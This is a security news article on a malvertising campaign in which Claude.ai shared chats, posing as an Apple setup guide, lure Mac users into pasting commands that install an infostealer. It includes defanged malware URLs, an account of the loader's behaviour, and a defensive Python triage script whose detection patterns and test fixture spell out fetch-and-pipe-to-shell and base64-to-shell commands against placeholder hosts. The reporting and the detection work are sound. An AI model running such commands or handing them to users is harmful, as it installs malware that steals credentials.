Hackers are exploiting Google Ads and authentic Claude.ai shared conversations in a current malvertising operation.
People looking for “Claude mac download” might encounter paid search listings that display claude.ai as the destination site, yet redirect them to steps that install harmful software on their Mac.

Shared Claude Chats exploited to attack macOS users
The operation was discovered by Berk Albayrak, a security engineer at Trendyol Group, who posted his analysis on LinkedIn.

Albayrak found a Claude.ai shared conversation that masquerades as an official “Claude Code on Mac” setup guide, credited to “Apple Support.”
The conversation guides users through launching Terminal and copying a command, which quietly downloads and executes malware on their Mac.
While trying to confirm Albayrak’s findings, BleepingComputer encountered a second shared Claude conversation performing the same attack using completely different infrastructure.
Both conversations follow the same format and manipulation tactics but rely on separate domains and malicious files. Both were publicly available at the time of publication.

What does the macOS malware do?
The base64 commands shown in the shared Claude conversation retrieve an encoded shell script from domains such as:
- In the variant spotted by Albayrak [VirusTotal]: hxxp://customroofingcontractors[.]com/curl/b42a0ed9d1ecb72e42d6034502c304845d98805481d99cea4e259359f9ab206e
- In the variant spotted by BleepingComputer [VirusTotal]: hxxps://bernasibutuwqu2[.]com/debug/loader.sh?build=a39427f9d5bfda11277f1a58c89b7c2d
The ‘loader.sh’ (delivered by the second link above) contains another layer of gzip-compressed shell commands.

This compressed shell script operates entirely in memory, leaving a minimal footprint on disk.
BleepingComputer noticed the server delivering a uniquely obfuscated version of the payload with each request (a method called polymorphic delivery), making it more difficult for security products to detect the download using known hashes or signatures.
The variant found by BleepingComputer begins by verifying whether the system has Russian or CIS-region keyboard input sources set up. If one is detected, the script terminates without taking any action, quietly sending a cis_blocked status notification to the attacker’s server before exiting. Only systems that clear this check proceed to the next phase.

Before moving forward, the script also gathers the victim’s external IP address, hostname, OS version, and keyboard locale, transmitting everything back to the attacker. This type of victim profiling before delivering the payload indicates the operators are carefully choosing their targets.
The script then downloads a second-stage payload and executes it through osascript, macOS’s native scripting engine. This allows the attacker to run remote code without ever placing a traditional application or binary on the system.
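As an added defender’s example (not code from the campaign, from BleepingComputer or from Anthropic), the Python below triages a pasted Terminal command the way the text above describes the loader: it peels base64 and gunzip layers and reports, per layer, a fetch or decode piped into a shell, osascript use and keyboard-layout probing. The fixture, the .invalid hosts and the indicator names are constructed; the HIToolbox plist keys used for the locale-probe heuristic are an assumption.

```python
import base64
import gzip
import re
import zlib

# "... | sh", "| bash", "| sudo zsh": anything piped into an interpreter.
SHELL_SINK = r"\|\s*(sudo\s+)?(ba|z)?sh\b"
INDICATORS = {
    "fetch_piped_to_shell":   re.compile(r"\b(curl|wget)\b[^\n]*" + SHELL_SINK),
    "base64_decode_to_shell": re.compile(r"\bbase64\s+(-d|-D|--decode)\b[^\n]*" + SHELL_SINK),
    "gunzip_to_shell":        re.compile(r"\b(gunzip|zcat|gzip\s+-d)\b[^\n]*" + SHELL_SINK),
    "osascript":              re.compile(r"\bosascript\b"),
    # Keyboard-layout probing like the CIS check described above (assumed plist keys).
    "input_source_probe":     re.compile(r"com\.apple\.HIToolbox|Apple(Enabled|Selected)InputSources"),
}
B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")   # long base64-looking runs

def unwrap(text, depth=0, max_depth=4):
    """Yield (depth, text) for the command and every base64 / gzip layer nested in it."""
    yield depth, text
    if depth >= max_depth:
        return
    for run in B64_RUN.findall(text):
        try:
            raw = base64.b64decode(run, validate=True)
            if raw[:2] == b"\x1f\x8b":              # gzip magic: a loader.sh-style layer
                raw = gzip.decompress(raw)
            inner = raw.decode("utf-8")
        except (ValueError, OSError, EOFError, zlib.error):
            continue                                # not a decodable text layer
        yield from unwrap(inner, depth + 1, max_depth)

def triage(command):
    """Return {indicator: shallowest layer depth at which it was seen}; {} means nothing flagged."""
    findings = {}
    for depth, layer in unwrap(command):
        for name, rx in INDICATORS.items():
            if name not in findings and rx.search(layer):
                findings[name] = depth
    return findings

# Constructed fixture mirroring the layering the article describes (base64 -> gzip ->
# script); the .invalid hosts never resolve, so this is inert test input.
INNER_SCRIPT = ('curl -fsSL http://stage2.example.invalid/s | sh\n'
                'osascript -e "$(curl -fsSL http://stage3.example.invalid/a)"\n')

def build_sample():
    blob = base64.b64encode(gzip.compress(INNER_SCRIPT.encode())).decode()
    return f"echo {blob} | base64 -d | gunzip | sh"
```

A depth of 0 means the behaviour is visible in the pasted command itself; depth 1 or more means it only appears after decoding, which is itself a strong signal that a "setup guide" is not what it claims to be.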
The variant discovered by Albayrak, on the other hand, appears to skip the profiling steps entirely. It moves directly to execution.
It collects browser credentials, cookies, and macOS Keychain data, bundles them together, and sends them to the attacker’s server. Albayrak classified this as a variant of the MacSync macOS infostealer.

The briskinternet[.]com domain used by the variant identified by Albayrak appeared to be offline at the time of publication.
When the legitimate URL becomes the threat
Malvertising has turned into a frequent method for spreading malware.
BleepingComputer has previously covered similar operations targeting people searching for software like GIMP, where a convincing Google ad would display a legitimate-looking domain but redirect visitors to a counterfeit phishing page instead.
This campaign reverses that approach, as there is no fake domain to identify.
Both Google ads observed here direct users to Anthropic’s actual domain, claude.ai, since the attackers are embedding their malicious instructions within Claude’s own shared chat functionality. The URL in the ad is authentic.
However, this isn’t the first time attackers have misused AI platform shared chats in this manner. In December, BleepingComputer reported a similar operation targeting ChatGPT and Grok users.
Users should go directly to claude.ai to download the native Claude app, rather than clicking on sponsored search results. The legitimate Claude Code CLI can be obtained through Anthropic’s official documentation and does not involve pasting commands from a chat window.
It is wise to always treat any instructions asking you to paste terminal commands with skepticism, no matter where those instructions seem to originate.
BleepingComputer contacted Anthropic and Google for comment before publishing.
